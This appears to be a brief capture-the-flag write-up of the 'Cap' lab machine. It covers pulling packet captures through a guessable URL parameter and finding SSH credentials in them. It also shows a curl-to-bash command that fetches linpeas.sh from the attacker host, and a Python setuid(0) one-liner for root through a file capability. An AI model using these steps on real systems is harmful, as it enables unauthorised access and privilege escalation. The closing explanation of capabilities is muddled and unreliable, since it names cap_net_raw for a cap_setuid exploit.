Post

Cap - Exposed Creds

port 80 > Dashboard page with ifconfig ( executing commands ), on security page we can download wireshark files, url has data=0,1,2 parameter and we can access any account history > nathan account in wireshark traffic along the password > login ssh, linpeas.sh

https://man7.org/linux/man-pages/man7/capabilities.7.html

Went on rabbit hole with this CVE from the enum script. CVE-2021-3560

Image

Image

From our shell on Cap, we can fetch linpeas.sh with curl and pipe the output directly into bash to execute it:

1
curl http://10.10.14.24/linpeas.sh | bash

Open:

1
nathan@cap:/tmp$ /usr/bin/python3.8

import os os.setuid(0) os.system(“/bin/bash”

Image


1
getcap /usr/bin/python3.8

This allows Python scripts to create raw sockets without requiring root privileges.​

1
sudo setcap cap_net_raw+ep /usr/bin/python3
This post is licensed under CC BY 4.0 by the author.